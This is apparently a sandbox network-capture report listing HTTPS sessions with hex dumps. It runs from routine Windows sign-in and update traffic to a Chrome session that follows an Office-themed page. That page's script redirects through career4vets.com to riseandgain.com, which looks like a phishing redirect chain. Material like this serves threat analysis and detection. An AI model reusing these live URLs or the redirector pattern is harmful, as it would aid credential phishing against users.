                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12192.168.2.164972920.190.159.2443
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:41:04 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                Connection: Keep-Alive
                                                Content-Type: application/soap+xml
                                                Accept: */*
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                Content-Length: 4710
                                                Host: login.live.com
                                                2024-08-20 13:41:04 UTC4710OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                2024-08-20 13:41:05 UTC569INHTTP/1.1 200 OK
                                                Cache-Control: no-store, no-cache
                                                Pragma: no-cache
                                                Content-Type: application/soap+xml; charset=utf-8
                                                Expires: Tue, 20 Aug 2024 13:40:05 GMT
                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                Referrer-Policy: strict-origin-when-cross-origin
                                                x-ms-route-info: C538_SN1
                                                x-ms-request-id: c5cbd0a8-73e0-4f6d-884f-1925086630b3
                                                PPServer: PPV: 30 H: SN1PEPF0002F951 V: 0
                                                X-Content-Type-Options: nosniff
                                                Strict-Transport-Security: max-age=31536000
                                                X-XSS-Protection: 1; mode=block
                                                Date: Tue, 20 Aug 2024 13:41:04 GMT
                                                Connection: close
                                                Content-Length: 10173
                                                2024-08-20 13:41:05 UTC10173INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13192.168.2.164973120.190.159.2443
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:41:06 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                Connection: Keep-Alive
                                                Content-Type: application/soap+xml
                                                Accept: */*
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                Content-Length: 4710
                                                Host: login.live.com
                                                2024-08-20 13:41:06 UTC4710OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                2024-08-20 13:41:07 UTC569INHTTP/1.1 200 OK
                                                Cache-Control: no-store, no-cache
                                                Pragma: no-cache
                                                Content-Type: application/soap+xml; charset=utf-8
                                                Expires: Tue, 20 Aug 2024 13:40:07 GMT
                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                Referrer-Policy: strict-origin-when-cross-origin
                                                x-ms-route-info: C538_BAY
                                                x-ms-request-id: 55447811-b296-4a98-b3d3-6f900c72031c
                                                PPServer: PPV: 30 H: PH1PEPF00011EDB V: 0
                                                X-Content-Type-Options: nosniff
                                                Strict-Transport-Security: max-age=31536000
                                                X-XSS-Protection: 1; mode=block
                                                Date: Tue, 20 Aug 2024 13:41:06 GMT
                                                Connection: close
                                                Content-Length: 10173
                                                2024-08-20 13:41:07 UTC10173INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.164973440.68.123.157443
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:41:37 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=sr5KOmdYZKCn+Vv&MD=WGz5RGkc HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept: */*
                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                Host: slscr.update.microsoft.com
                                                2024-08-20 13:41:37 UTC560INHTTP/1.1 200 OK
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                Content-Type: application/octet-stream
                                                Expires: -1
                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                MS-CorrelationId: cd43f261-cc4b-4e4b-a8dd-f6d57831feb2
                                                MS-RequestId: 5e0a552f-8641-4d57-a322-109b24ee389b
                                                MS-CV: wHdSSJ0NNUCsI4Yy.0
                                                X-Microsoft-SLSClientCache: 1440
                                                Content-Disposition: attachment; filename=environment.cab
                                                X-Content-Type-Options: nosniff
                                                Date: Tue, 20 Aug 2024 13:41:37 GMT
                                                Connection: close
                                                Content-Length: 30005
                                                2024-08-20 13:41:37 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                2024-08-20 13:41:37 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.1649737162.241.114.354435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:41:51 UTC786OUTPOST /5069167943.php HTTP/1.1
                                                Host: willpeltz.com
                                                Connection: keep-alive
                                                Content-Length: 0
                                                Cache-Control: max-age=0
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                Origin: null
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:41:51 UTC159INHTTP/1.1 200 OK
                                                Date: Tue, 20 Aug 2024 13:41:51 GMT
                                                Server: Apache
                                                Connection: close
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                2024-08-20 13:41:51 UTC375INData Raw: 31 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 20 74 6f 20 4f 66 66 69 63 65 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 65 63 6f 64 65 64 55 72 6c 20 3d 20 22 68 74 74 70 73 3a 2f 2f 63 61 72 65 65 72 34 76 65 74 73 2e 63 6f 6d 2f 6e 65 77 2f 72 6f 63 6b 79 2e 70 68 70 22 3b 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65
                                                Data Ascii: 170<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Welcome to Office</title></head><body> <script> var decodedUrl = "https://career4vets.com/new/rocky.php"; setTime
                                                2024-08-20 13:41:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.1649738162.241.87.1134435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:41:53 UTC690OUTGET /new/rocky.php HTTP/1.1
                                                Host: career4vets.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: document
                                                Referer: https://willpeltz.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:41:55 UTC371INHTTP/1.1 302 Found
                                                Date: Tue, 20 Aug 2024 13:41:53 GMT
                                                Server: Apache
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                Set-Cookie: PHPSESSID=c7d47dd974caf13f072b88c1c502e16e; path=/
                                                Location: https://riseandgain.com
                                                Connection: close
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                2024-08-20 13:41:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.1649741162.241.87.1134435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:41:56 UTC677OUTGET / HTTP/1.1
                                                Host: riseandgain.com
                                                Connection: keep-alive
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: document
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Referer: https://willpeltz.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:41:56 UTC159INHTTP/1.1 200 OK
                                                Date: Tue, 20 Aug 2024 13:41:56 GMT
                                                Server: Apache
                                                Connection: close
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                2024-08-20 13:41:56 UTC5926INData Raw: 31 37 31 65 0d 0a ef bb bf 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73
                                                Data Ascii: 171e<html> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script> <s
                                                2024-08-20 13:41:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.1649742104.17.25.144435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:41:57 UTC561OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                Host: cdnjs.cloudflare.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://riseandgain.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:41:57 UTC956INHTTP/1.1 200 OK
                                                Date: Tue, 20 Aug 2024 13:41:57 GMT
                                                Content-Type: application/javascript; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Access-Control-Allow-Origin: *
                                                Cache-Control: public, max-age=30672000
                                                ETag: W/"5eb03e2d-bb78"
                                                Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                cf-cdnjs-via: cfworker/kv
                                                Cross-Origin-Resource-Policy: cross-origin
                                                Timing-Allow-Origin: *
                                                X-Content-Type-Options: nosniff
                                                CF-Cache-Status: HIT
                                                Age: 493267
                                                Expires: Sun, 10 Aug 2025 13:41:57 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GuXfflF3DE8sVPsi%2FSvFk55YcKz0YjWK6%2BVhK5qNP4zAzBg5LkLbmGUlDo1up75yFxFdWyGoRNtD089I5hsg7b7MNRqxYGaZo3IkDjLkUIFfrIFANUswwkNpMLFV1f0OsIgcNdUg"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                Strict-Transport-Security: max-age=15780000
                                                Server: cloudflare
                                                CF-RAY: 8b62cdc9e84543ac-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-20 13:41:57 UTC413INData Raw: 33 39 37 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                Data Ascii: 397a!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                2024-08-20 13:41:57 UTC1369INData Raw: 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e
                                                Data Ascii: ndow.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.
                                                2024-08-20 13:41:57 UTC1369INData Raw: 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e
                                                Data Ascii: <n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function
                                                2024-08-20 13:41:57 UTC1369INData Raw: 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42
